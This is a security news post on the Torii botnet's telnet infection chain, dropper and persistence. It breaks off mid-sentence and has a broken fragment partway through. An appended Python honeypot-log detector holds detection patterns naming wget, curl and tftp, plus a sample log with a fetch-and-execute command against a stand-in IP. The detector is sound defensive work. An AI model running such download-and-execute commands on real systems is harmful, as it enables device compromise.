IoT botnet Torii found targeting attacks on smart home devices


Posted by TelegramGroup IoTForIndia (Moderator, @iotforindiatggroup)

        #News(Security) [ via IoTForIndiaGroup ]


        Torii botnet targets smart home IoT devices.
        The botnet can communicate securely and stealthily, as well as execute different commands sent by the malware author.

        A new IoT botnet named ‘Torii’ was found targeting smart home devices. Security researchers consider it to be the “most sophisticated botnet” they’ve ever seen. This is primarily due to Torii using six different methods for persistence. The botnet also uses a different script from other typical IoT malware in the wild.

        The malware author(s) appear to have designed Torii to be stealthy and persistent. Torii’s operator(s) also created binaries for multiple architectures to execute its advanced features. Communication with the command and control (C2) servers is encrypted, and other advanced functions of the malware include exfiltration and command execution.
        otted the ‘Torii’ botnet strain in his Telnet honeypot, and published a detailed report on the botnet.

        Malware infection vector
        Torii begins with a telnet attack against targeted devices that have weak credentials, after which the botnet executes an initial shell script. The botnet then attempts to discover the architecture of the targeted device and downloads an appropriate payload for it.

        After determining the architecture, the botnet downloads and executes the appropriate binary (dropper) from the C2 server. These droppers are always binary files, in ELF format, and prepare for the second stage of the attack. Once the ELF and executable files are installed, the dropper makes sure that it remains persistent.

        However, this persistence is achieved using at least six methods


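As an added example (not part of the original post or the researchers' report): a Python check a telnet honeypot operator could run to flag sessions that follow the sequence described under "Malware infection vector", that is an architecture probe, then a download, then execution. The log format, the command patterns and the sample sessions are assumptions constructed for illustration, not Torii indicators.

```python
import re
from collections import defaultdict

# Generic post-login command patterns (assumptions, not Torii indicators).
# Each is matched against one shell command, optionally run through busybox.
STAGES = [
    ("arch_probe", re.compile(r"^(busybox\s+)?(uname\s+-\w*[am]\w*|cat\s+/proc/cpuinfo)")),
    ("download", re.compile(r"^(busybox\s+)?(wget|curl|tftp|ftpget)\s+\S+")),
    ("execute", re.compile(r"^(chmod\s+(\+x|[0-7]{3,4})\s+\S+|\./\S+|/(tmp|var|dev)/\S+)")),
]
# Assumed honeypot log line: "<timestamp> session=<id> cmd=<raw command line>"
LINE = re.compile(r"^\S+\s+session=(?P<sid>\S+)\s+cmd=(?P<cmd>.*)$")

def parse(log_text):
    """Group commands by session, splitting chains joined by ';', '&&' or '||'."""
    sessions = defaultdict(list)
    for raw in log_text.splitlines():
        m = LINE.match(raw.strip())
        if not m:
            continue  # skip blank or malformed lines
        parts = re.split(r"\s*(?:;|&&|\|\|)\s*", m["cmd"])
        sessions[m["sid"]].extend(p for p in parts if p)
    return sessions

def stages_in_order(commands):
    """Return the stages a session reached, counting them only in sequence."""
    reached = []
    for cmd in commands:
        if len(reached) < len(STAGES) and STAGES[len(reached)][1].search(cmd):
            reached.append(STAGES[len(reached)][0])
    return reached

def detect(log_text):
    """Session ids that probed the architecture, then downloaded, then executed."""
    return sorted(sid for sid, cmds in parse(log_text).items()
                  if len(stages_in_order(cmds)) == len(STAGES))

# Constructed sample sessions (198.51.100.0/24 is a documentation range).
SAMPLE_LOG = """
2024-01-01T00:00:01Z session=s1 cmd=uname -m
2024-01-01T00:00:02Z session=s1 cmd=cd /tmp; wget http://198.51.100.7/payload -O /tmp/p
2024-01-01T00:00:03Z session=s1 cmd=chmod +x /tmp/p && /tmp/p
2024-01-01T00:00:04Z session=s2 cmd=uname -a
2024-01-01T00:00:05Z session=s2 cmd=ls /
2024-01-01T00:00:06Z session=s3 cmd=busybox wget http://198.51.100.7/payload
2024-01-01T00:00:07Z session=s3 cmd=cat /proc/cpuinfo
"""

if __name__ == "__main__":
    for sid in detect(SAMPLE_LOG):
        print(f"session {sid}: probe -> download -> execute sequence observed")
```

Only session s1 is flagged: s2 stops after the probe, and s3 downloads before probing, so neither completes the sequence in order.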
